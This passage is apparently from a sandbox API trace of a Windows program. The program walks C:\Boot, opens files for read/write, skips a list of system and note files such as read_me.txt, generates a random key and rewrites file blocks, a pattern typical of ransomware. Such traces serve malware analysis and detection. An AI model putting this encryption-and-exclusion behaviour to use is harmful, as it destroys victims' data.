RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.461] GetProcessHeap () returned 0x280000 [0080.461] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.462] GetProcessHeap () returned 0x280000 [0080.462] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.462] GetProcessHeap () returned 0x280000 [0080.463] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.463] GetProcessHeap () returned 0x280000 [0080.463] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0080.464] GetProcessHeap () returned 0x280000 [0080.464] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0080.464] SetFilePointerEx (in: hFile=0x87c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.464] WriteFile (in: hFile=0x87c, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0080.464] WriteFile (in: hFile=0x87c, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0080.465] GetProcessHeap () returned 0x280000 [0080.465] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0080.465] GetProcessHeap () returned 0x280000 [0080.465] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0080.473] GetProcessHeap () returned 0x280000 [0080.473] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0080.473] CloseHandle (hObject=0x87c) returned 1 [0080.474] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 60 [0080.474] SetFilePointerEx (in: hFile=0x880, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.474] ReadFile (in: hFile=0x880, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0080.474] SetFilePointerEx (in: hFile=0x880, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.475] GetProcessHeap () returned 0x280000 [0080.475] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0080.475] GetProcessHeap () returned 0x280000 [0080.475] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0080.475] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0080.475] GetProcessHeap () returned 0x280000 [0080.475] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0080.475] ReadFile (in: hFile=0x880, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 Thread: id = 6 os_tid = 0x958 [0073.597] GetProcessHeap () returned 0x280000 [0073.597] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a70098 [0073.598] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0073.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.598] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0073.598] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.598] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0073.599] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0073.599] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0073.599] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.599] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0073.599] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0073.599] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG" (normalized: "c:\\boot\\bcd.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.599] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0073.599] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0073.599] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="read_me.txt") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="autoexec.bat") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="desktop.ini") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="autorun.inf") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="ntuser.dat") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="iconcache.db") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="bootsect.bak") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="boot.ini") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="ntuser.dat.log") returned 0x0 [0073.600] StrStrW (lpFirst="bcd.log1", lpSrch="thumbs.db") returned 0x0 [0073.600] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 0 [0073.600] QueueUserWorkItem (Function=0x404e00, Context=0x7ac, Flags=0x0) returned 1 [0073.600] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0073.600] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0073.600] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0073.600] StrStrW (lpFirst="bcd.log2", lpSrch="read_me.txt") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="autoexec.bat") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="desktop.ini") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="autorun.inf") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="ntuser.dat") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="iconcache.db") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="bootsect.bak") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="boot.ini") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="ntuser.dat.log") returned 0x0 [0073.601] StrStrW (lpFirst="bcd.log2", lpSrch="thumbs.db") returned 0x0 [0073.601] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 1 [0073.601] QueueUserWorkItem (Function=0x404e00, Context=0x7b0, Flags=0x0) returned 1 [0073.601] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0073.601] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0073.601] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b8 [0073.601] StrStrW (lpFirst="bootstat.dat", lpSrch="read_me.txt") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="autoexec.bat") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="desktop.ini") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="autorun.inf") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="ntuser.dat") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="iconcache.db") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="bootsect.bak") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="boot.ini") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="ntuser.dat.log") returned 0x0 [0073.602] StrStrW (lpFirst="bootstat.dat", lpSrch="thumbs.db") returned 0x0 [0073.602] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 2 [0073.602] QueueUserWorkItem (Function=0x404e00, Context=0x7b8, Flags=0x0) returned 1 [0073.602] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0073.602] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0073.602] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0073.602] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0073.602] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0073.602] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0073.602] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0073.602] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0073.602] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0073.602] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0073.602] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0073.602] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\es-ES") returned 17 [0073.602] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0073.602] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI") returned 17 [0073.602] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0073.603] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0073.603] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0073.603] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0073.603] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, 